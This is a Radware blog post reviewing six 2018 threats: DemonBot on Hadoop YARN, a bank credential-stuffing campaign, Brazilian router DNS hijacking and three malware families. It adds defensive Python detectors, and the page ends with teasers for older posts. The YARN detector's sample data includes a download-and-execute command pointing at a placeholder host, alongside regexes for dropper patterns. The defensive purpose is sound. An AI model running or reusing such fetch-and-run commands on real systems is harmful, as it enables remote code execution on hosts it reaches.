
Top 6 Threat Discoveries of 2018

December 18, 2018 — by Radware


Over the course of 2018, Radware’s Emergency Response Team (ERT) identified several cyberattacks and security threats across the globe. Below is a round-up of our top discoveries from the past year. For more detailed information on each attack, please visit DDoS Warriors.

DemonBot

Radware’s Threat Research Center has been monitoring and tracking a malicious agent that leverages an unauthenticated remote command execution in Hadoop YARN (Yet Another Resource Negotiator) to infect Hadoop clusters with an unsophisticated new bot that identifies itself as DemonBot. The weakness is not a software bug but an exposed ResourceManager REST API: anyone who can reach it can submit an application whose launch command is then executed on a cluster node.

DemonBot was identified after a spike in requests for /ws/v1/cluster/apps/new-application, the first call in the YARN job-submission sequence, appeared in our Threat Deception Network. We have since been tracking over 70 active exploit servers that are spreading DemonBot at an aggregate rate of more than 1 million exploit attempts per day.
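A way to act on this at the cluster, as an added example (not Radware's or DemonBot's code): the first function probes whether a ResourceManager hands out application IDs to an unauthenticated caller, which is the request described above, and the rest triages the launch commands of submitted applications for download-and-execute patterns. The JSON shape is the documented YARN REST submission format; the heuristics, the sample records and the 203.0.113.5 address (a TEST-NET documentation address) are assumptions constructed for illustration, not a DemonBot signature.

```python
"""Probe a YARN ResourceManager for open job submission and triage launch commands.

Added example (not Radware's code). Assumes the YARN ResourceManager REST
submission format (POST /ws/v1/cluster/apps with an `am-container-spec` that
carries the launch `command`), the channel abused when the API is reachable
without authentication. The sample records and 203.0.113.5 are constructed.
"""
import json
import re
import urllib.error
import urllib.request

# Heuristics for "download something and run it" launch commands. These are
# generic dropper patterns, not a signature of any particular bot.
DROPPER_PATTERNS = [
    (r"\b(wget|curl|tftp|ftpget)\b", "fetches a remote file"),
    (r"\b(wget|curl)\b[^|;&]*\|\s*(sh|bash)\b", "pipes a download into a shell"),
    (r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b", "marks a file executable"),
    (r"(^|[;&|]\s*)\./\S+", "runs a freshly written file"),
    (r"\b(busybox|nc|ncat)\b", "calls a common bot helper binary"),
]


def launch_commands(submission):
    """Return the AM container launch command(s) from one YARN submission body."""
    cmd = submission.get("am-container-spec", {}).get("commands", {}).get("command", "")
    return cmd if isinstance(cmd, list) else [cmd]


def score_command(cmd):
    """Return the descriptions of every dropper heuristic a command matches."""
    return [why for pat, why in DROPPER_PATTERNS if re.search(pat, cmd, re.IGNORECASE)]


def triage_submissions(submissions, min_hits=2):
    """Flag submissions whose launch command trips at least `min_hits` heuristics.

    Returns a list of (application-id, sorted list of matched heuristics).
    """
    flagged = []
    for sub in submissions:
        hits = set()
        for cmd in launch_commands(sub):
            hits.update(score_command(cmd))
        if len(hits) >= min_hits:
            flagged.append((sub.get("application-id", "?"), sorted(hits)))
    return flagged


def new_application_open(rm_base_url, timeout=5):
    """Probe whether the RM hands out application IDs without authentication.

    A 200 response carrying an `application-id` is what an attacker sees before
    submitting a job; 401/403 means the API is gated. Needs network access and
    returns None when the endpoint cannot be reached or answers unexpectedly.
    """
    req = urllib.request.Request(
        rm_base_url.rstrip("/") + "/ws/v1/cluster/apps/new-application",
        data=b"", method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return "application-id" in json.loads(resp.read().decode())
    except urllib.error.HTTPError as e:
        return False if e.code in (401, 403) else None
    except (urllib.error.URLError, ValueError, OSError):
        return None


# Constructed sample records in the YARN submission format (not real captures).
SAMPLE_SUBMISSIONS = [
    {
        "application-id": "application_1545120000000_0001",
        "application-name": "nightly-etl",
        "am-container-spec": {"commands": {"command":
            "{{JAVA_HOME}}/bin/java -Xmx256m com.example.etl.ApplicationMaster"}},
    },
    {
        "application-id": "application_1545120000000_0002",
        "application-name": "hadoop",
        "am-container-spec": {"commands": {"command":
            "cd /tmp; wget http://203.0.113.5/bins.sh -O bins.sh; chmod +x bins.sh; ./bins.sh"}},
    },
]

if __name__ == "__main__":
    for app_id, reasons in triage_submissions(SAMPLE_SUBMISSIONS):
        print(app_id, "->", ", ".join(reasons))
```

Run `new_application_open("http://<rm-host>:8088")` against your own ResourceManager (8088 is the RM's default HTTP port); a `True` result means anyone who can reach that port can run commands on the cluster, and the fix is Kerberos/SPNEGO on the web UI plus a network ACL, not a signature. `triage_submissions` expects the POST bodies themselves, captured from the RM's HTTP access log or a reverse proxy in front of it.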


Credential Stuffing Campaign

In October, Radware began tracking a credential stuffing campaign, a subset of brute force attacks, targeting the financial industry in the United States and Europe.

This particular campaign is motivated by fraud. Criminals are using credentials from prior data breaches to gain access to users’ bank accounts. When a significant breach occurs, the compromised email addresses and passwords are quickly leveraged by cybercriminals. Armed with tens of millions of credentials from recently breached websites, attackers use scripts and proxies to spread their login attempts across many source addresses and take over banking accounts. The attempts can arrive in such volume that they resemble a distributed denial-of-service (DDoS) attack, but the pattern differs from a password brute force: each source tries many different usernames, typically once each, rather than one account many times.
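That difference is something a log pipeline can measure. The block below is an added example, not Radware's code: it parses a constructed authentication log, flags sources that cycle through many distinct accounts within a short window, and lists the accounts that accepted a login from such a source. The log format, the thresholds and the addresses (all from documentation ranges) are assumptions.

```python
"""Separate credential stuffing from ordinary failed logins in an auth log.

Added example, not Radware's code. Credential stuffing replays username and
password pairs from other sites' breaches, so each source address tries many
different accounts roughly once each, and any success is a likely account
takeover. A password brute force tries one account many times and does not
trip the same metric. The log lines and the addresses in 192.0.2.0/24,
198.51.100.0/24 and 203.0.113.0/24 are constructed for illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: "<ISO timestamp> <source IP> <username> <OK|FAIL>"
SAMPLE_LOG = """\
2018-10-04T09:00:01Z 198.51.100.10 alice.m FAIL
2018-10-04T09:00:02Z 198.51.100.10 bob.k FAIL
2018-10-04T09:00:02Z 198.51.100.10 carol.r FAIL
2018-10-04T09:00:03Z 198.51.100.10 dave.s OK
2018-10-04T09:00:04Z 198.51.100.10 erin.t FAIL
2018-10-04T09:00:05Z 198.51.100.10 frank.w FAIL
2018-10-04T09:00:06Z 198.51.100.11 gina.h FAIL
2018-10-04T09:00:07Z 198.51.100.11 hank.p FAIL
2018-10-04T09:00:08Z 198.51.100.11 ivy.l FAIL
2018-10-04T09:00:09Z 198.51.100.11 jack.o FAIL
2018-10-04T09:00:10Z 198.51.100.11 kim.b FAIL
2018-10-04T09:00:11Z 203.0.113.7 alice.m FAIL
2018-10-04T09:00:15Z 203.0.113.7 alice.m FAIL
2018-10-04T09:00:20Z 203.0.113.7 alice.m OK
2018-10-04T09:05:00Z 192.0.2.33 bob.k OK
"""


def parse_log(text):
    """Parse the constructed format into sorted (timestamp, src_ip, user, success) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, result = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user, result == "OK"))
    return sorted(events)


def detect_stuffing(events, window=timedelta(minutes=5), min_users=5, min_ratio=0.8):
    """Flag sources that try >= min_users distinct accounts inside `window`,
    with distinct accounts making up >= min_ratio of their attempts.

    Returns {src_ip: {"attempts": n, "users": k, "compromised": [accounts]}},
    keeping the busiest qualifying window per source.
    """
    by_ip = defaultdict(list)
    for ts, ip, user, ok in events:
        by_ip[ip].append((ts, user, ok))
    findings = {}
    for ip, evs in by_ip.items():
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:  # slide the window forward
                start += 1
            win = evs[start:end + 1]
            users = {u for _, u, _ in win}
            if len(users) >= min_users and len(users) / len(win) >= min_ratio:
                if ip not in findings or len(win) > findings[ip]["attempts"]:
                    findings[ip] = {
                        "attempts": len(win),
                        "users": len(users),
                        "compromised": sorted({u for _, u, ok in win if ok}),
                    }
    return findings


def takeover_candidates(findings):
    """Accounts that accepted a login from a flagged source: reset these first."""
    return sorted({u for f in findings.values() for u in f["compromised"]})


if __name__ == "__main__":
    hits = detect_stuffing(parse_log(SAMPLE_LOG))
    for ip, f in hits.items():
        print(f"{ip}: {f['users']} accounts in {f['attempts']} attempts, successes {f['compromised']}")
    print("force reset:", takeover_candidates(hits))
```

The third source in the sample (203.0.113.7) hammers one account three times and is not flagged; it is a brute force or a forgetful user, and a per-account lockout handles it. The stuffing sources are flagged even though a single attempt per account never trips a lockout, which is why per-source distinct-account counting belongs in the detection alongside per-account failure counting.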

DNS Hijacking Targets Brazilian Banks

This summer, Radware’s Threat Research Center identified a DNS hijacking campaign aimed at Brazilian bank customers through their home routers, attempting to steal their banking credentials.

The research center had been tracking malicious activity targeting D-Link DSL modem routers in Brazil since early June. Using exploits that have been public since 2015, a malicious agent attempts to modify the DNS server settings in the routers of Brazilian residents so that all of their DNS requests go through a malicious DNS server. That server hijacks requests for the hostname of Banco do Brasil (www.bb.com.br) and answers with the address of a fake, cloned website hosted on the same malicious server, which has no connection whatsoever to the legitimate Banco do Brasil website. Because the redirection happens at name resolution, every device behind the router is affected and the victim sees the bank’s real hostname in the address bar.
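A household or small-office check for the hijack described above, added here as an example rather than Radware's code: it sends a raw DNS query to the resolver the router hands out and to independent resolvers, then compares the A records returned for the bank's hostname. www.bb.com.br is the hostname from the article; the router address 192.168.0.1, the trusted resolvers 1.1.1.1 and 8.8.8.8, and the reading of any overlap as "ok" are assumptions for illustration. It needs only the Python standard library.

```python
"""Check whether the resolver handed out by a router answers a bank hostname honestly.

Added example (not Radware's code). A hijacked modem points every client at an
attacker-run resolver, so the tell-tale sign is that the router's resolver
returns a different address for the bank than independent resolvers do.
Assumptions: router resolver at 192.168.0.1, trusted resolvers 1.1.1.1 and
8.8.8.8; the hostname www.bb.com.br is the one named in the article.
"""
import random
import socket
import struct


def build_a_query(qname, txid):
    """Build a minimal DNS query for an A record (RD=1, one question, no EDNS)."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    labels = b"".join(bytes([len(l)]) + l.encode("ascii")
                      for l in qname.rstrip(".").split("."))
    return header + labels + b"\x00" + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN


def _skip_name(msg, off):
    """Advance past a (possibly compressed) domain name in a DNS message."""
    while True:
        length = msg[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:  # compression pointer: two bytes, ends the name
            return off + 2
        off += 1 + length


def parse_a_answers(msg, txid):
    """Return the sorted IPv4 addresses in the answer section of a response."""
    rid, flags, qd, an, _ns, _ar = struct.unpack_from(">HHHHHH", msg, 0)
    if rid != txid or not flags & 0x8000:
        raise ValueError("not a response to our query")
    off = 12
    for _ in range(qd):
        off = _skip_name(msg, off) + 4  # skip QTYPE and QCLASS
    ips = []
    for _ in range(an):
        off = _skip_name(msg, off)
        rtype, rclass, _ttl, rdlen = struct.unpack_from(">HHIH", msg, off)
        off += 10
        if rtype == 1 and rclass == 1 and rdlen == 4:
            ips.append(socket.inet_ntoa(msg[off:off + 4]))
        off += rdlen
    return sorted(ips)


def resolve_a(qname, resolver, timeout=3.0):
    """Ask one specific resolver over UDP/53 for the A records of qname (network call)."""
    txid = random.getrandbits(16)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_a_query(qname, txid), (resolver, 53))
        data, _ = s.recvfrom(4096)
    return parse_a_answers(data, txid)


def hijack_verdict(router_answer, trusted_answers):
    """Compare the router resolver's answer with independent resolvers.

    "hijacked": the router's answer shares no address with any trusted answer;
    "ok": it overlaps with at least one; "inconclusive": the router returned nothing.
    """
    router = set(router_answer)
    if not router:
        return "inconclusive"
    if any(router & set(ans) for ans in trusted_answers):
        return "ok"
    return "hijacked"


def check_bank(qname="www.bb.com.br", router_dns="192.168.0.1",
               trusted=("1.1.1.1", "8.8.8.8")):
    """Resolve qname via the router and via trusted resolvers and return the verdict."""
    router = resolve_a(qname, router_dns)
    others = [resolve_a(qname, r) for r in trusted]
    return hijack_verdict(router, others), router, others


if __name__ == "__main__":
    verdict, router, others = check_bank()
    print(verdict, "router:", router, "trusted:", others)
```

Banks and their CDNs legitimately return different addresses to different resolvers, which is why the verdict looks for overlap with any trusted answer rather than equality, and why a "hijacked" result should be confirmed by inspecting the certificate the site presents before assuming the worst. Check the router's configured upstream DNS servers against your ISP's as well; changing that setting is the attack's first step.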


Nigelthorn Malware

In May, Radware’s cloud malware protection service detected a zero-day malware threat at one of its customers, a global manufacturing firm, using machine-learning algorithms. The malware campaign propagates via socially engineered links on Facebook and infects users by abusing a Google Chrome extension (the ‘Nigelify’ application) that performs credential theft, cryptomining, click fraud and more.

Further investigation by Radware’s Threat Research group revealed that this group has been active since at least March 2018 and has already infected more than 100,000 users in over 100 countries.


Stresspaint Malware Campaign

On April 12, 2018, Radware’s Threat Research group detected, via internal feeds, malicious activity by a group collecting user credentials and payment methods from Facebook users across the globe. The group manipulates victims via phishing emails into downloading a painting application called ‘Relieve Stress Paint.’ While benign in appearance, it runs malware dubbed ‘Stresspaint’ in the background. Within a few days, the group had infected over 40,000 users and stolen tens of thousands of Facebook credentials and session cookies.

DarkSky Botnet

In early 2018, Radware’s Threat Research group discovered a new botnet, dubbed DarkSky. DarkSky features several evasion mechanisms, a malware downloader and a variety of network- and application-layer DDoS attack vectors. This bot is now available for sale for less than $20 over the Darknet.

As published by its authors, this malware runs under Windows XP/7/8/10, in both 32-bit and 64-bit builds, and has anti-virtual-machine checks that stop it from running inside security controls such as a sandbox, so that it only infects ‘real’ machines.

Read the “IoT Attack Handbook – A Field Guide to Understanding IoT Attacks from the Mirai Botnet and its Modern Variants” to learn more.


A 5 Step Plan on How to Protect Yourself from Cybercrime

June 16, 2014 — by Adrian Crawley

Recently, I wrote an article for Help Net Security discussing the modus operandi of cybercriminals and how it leads to different types of cyber attacks. While we have previously encountered huge distributed denial of service (DDoS) attacks that appear to come from nowhere and flood the victim’s network, we have begun to see far stealthier and more sophisticated attacks causing just as much, if not more, damage.

eCrime Congress in Germany: Restoring the Equilibrium of Attackers Vs. Defenders

February 8, 2013 — by Ron Meyran

Last week, I attended the eCrime Congress in Frankfurt, Germany. Held on January 30, the event, of which Radware was one of the sponsors, featured a lecture track that ran throughout the day with breaks for the sponsors’ pavilion.

Shooting From Behind the Fence

February 8, 2013 — by Eyal Benishti

Can You Stay Anonymous While Participating in a DDoS Attack?
Taking part in a Hacktivist group is completely different from being part of a Botnet. In the Botnet case, participants are unknowingly “recruited” into an attack. In the Hacktivist group case, members take part in attack activities of their own accord.
Just this past month, Anonymous hackers in London were jailed for a series of DDoS attacks on PayPal and other payment services such as Visa and MasterCard.

New Attack Trends – Are You Bringing a Knife to the Gunfight?

January 22, 2013 — by Ziv Gadot

Today, we launched our 2012 Global Application and Network Security report. It was prepared by our security experts – the Emergency Response Team (ERT) – who’ve seen their fair share of cyber attacks while actively monitoring and mitigating attacks in real-time. In this year’s annual report, our experts have uncovered several new trends in cyber-security worthy of a closer look.


Last Week to Participate! Attack Mitigation Black Belt Final Round Begins Today.

July 16, 2012 — by Carl Herberger

If you’ve been waiting, now’s the time to participate – the last week of Radware’s Attack Mitigation Black Belt Challenge begins today and ends this week. And what a challenge it is! More and more people are participating each week and the leader board has changed hands a number of times – with the standing after the Red Belt challenge resulting in a tie for first place!


Calling All Attack Mitigation Experts – Red Belt Round Begins Today!

July 9, 2012 — by Carl Herberger

Two more weeks left in the Attack Mitigation Black Belt Challenge and congratulations to all who have earned a green belt. As we head into the next round of progressively difficult questions, we have a fierce competition for the Champion. “Brewer” is giving “dh” a run for the money, with only one second separating these first and second place contenders. Check out the Leader Board for the rankings.


Are you ready for your Green Belt in Attack Mitigation?

July 2, 2012 — by Carl Herberger

Knowledge Test Overview

Wow! The Attack Mitigation Black Belt Challenge is only two weeks old and already we have dueling leaders and intense competition.

People from all over the world are participating in Radware’s first Attack Mitigation Black Belt Challenge, and only seven seconds separate the current leader, “dh”, from fifth place. Some questions were clearly stumbling blocks: two questions in the Yellow Belt round were answered correctly by only 10% of participants.

From SC Magazine: Roy Zisapel, Radware CEO, Says Flame-Like Vulnerabilities Are Nothing New

June 29, 2012 — by Ronen Kenig

Yesterday, SC Magazine published an article by Radware’s president and CEO, Roy Zisapel, addressing the infamous Flame malware. Flame stole headlines over the past month, emerging as the most advanced computer virus ever found and a new level of sophistication in cyber warfare.